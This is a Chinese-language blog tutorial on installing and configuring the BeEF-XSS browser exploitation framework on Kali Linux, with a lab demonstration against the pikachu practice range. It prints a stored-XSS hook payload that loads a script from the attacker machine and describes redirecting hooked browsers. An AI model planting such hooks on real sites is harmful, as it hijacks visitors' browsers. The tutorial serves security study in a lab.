★★免责声明★★
文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与学习之用,读者将信息做其他用途,由Ta承担全部法律及连带责任,文章作者不承担任何法律及连带责任。
1、环境说明
kali系统,ip:192.168.242.4 ,攻击机
win7系统,ip: 192.168.242.5 ,靶机或部署服务机器
本文是为了下一篇《XSS另类攻击(五)Flash钓鱼配合MSF捆绑上线》准备。
2、kali系统配置准备
2.1、修改更新源目录
# 打开配置文件,按i进入编辑,按esc键退出编辑,输入【:wq!】保存
vim /etc/apt/sources.list# 建议使用中科大或清华的,阿里最近经常出现问题(日期:2024-05-30)
# 中科大
deb https://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src https://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
# 清华
deb https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main non-free contrib
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main non-free contrib
# 阿里
deb https://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src https://mirrors.aliyun.com/kali kali-rolling main non-free contrib
2.2、增加数字签名
# 1.下载签名
wget archive.kali.org/archive-key.asc
# 2.安装签名
apt-key add archiv./e-key.asc
# 3.更新一下
apt-get update
修改新的源目录,一定要下载和安装签名,不然无法使用下载。
参考博客:https://blog.csdn.net/weixin_43343679/article/details/133500343
2.3、修改docker镜像源
一般情况一下,镜像源和更新源目录设置一样的。
# 创建或打开daemon.json
vim /etc/docker/daemon.json# 按I键进入编辑状态,退出按Esc,保存按【:wq!】,退出不保存按【:q!】。# daemon.json文件加入以下内容,如果已经存在文件,有配置就不需要再添加
{"registry-mirrors": ["https://mirrors.ustc.edu.cn"]
}
# 中科大
https://mirrors.ustc.edu.cn
# 清华
https://mirrors.tuna.tsinghua.edu.cn
# 阿里
https://mirrors.aliyun.com
3、安装beef-xss
注意安装时,先切换到root账号
# 切换到root账号
sudo su
# 先升级
apt-get update
# 安装命令
apt-get install beef-xss
3.1、查看或修改密码
如果忘记密码或者想修改密码,可以到是/usr/share/beef-xss/config.yaml
配置文件查看,是明文存储的。修改完需要重启服务才会生效。
# 1、打开配置文件
vim /usr/share/beef-xss/config.yaml
# 2、重启beef-xss服务
systemctl restart beef-xss
3.2、启动服务
首次启动,会要求修改密码,默认用户名/密码都是:beef,修改密码不可以beef。
# 启动命令
beef-xss
看到关键字:active (running)
,绿色才是启动成功。
访问后台地址:http://ip:3000/ui/panel
3.3、常用命令
# 启动beef-xss命令,默认用户名/密码都是:beef,要求修改密码
beef-xss
# 停止beef-xss服务命令
service beef-xss stop
# 重启beef-xss服务
systemctl restart beef-xss
3.4、异常情况参考
如果启动服务后发现访问不了,可以参考:https://wiki.bafangwy.com/project-4/doc-322/ 。
4、beef-xss使用示例说明
以pikachu靶场的存储型XSS使用作为使用示例说明,
# 勾子脚本,IP地址是部署beef-xss服务的IP
<script src="http://192.168.242.4:3000/hook.js"></script>
把勾子脚本放到pikachu靶场的存储型XSS的留言框提交,
beef-xss后台刷新就可以看到被攻击的记录。
比如设置目标地址重定向想要的地址,设置完点按钮Execute
,如果用户停留在目标页面或从其他页面再次访问目标页面就会自动重定向,但是如果没有再去点按钮Execute
就不会重定向。
操作路径:
Commands
->Browser
->Hooked Domain
–>Redirect Browser
更多详细用法请使用参考:
https://bbs.huaweicloud.com/blogs/392268
https://blog.csdn.net/qq_53517370/article/details/128992559
5、我的公众号
敬请关注我的公众号:大象只为你,持续更新网安相关知识中…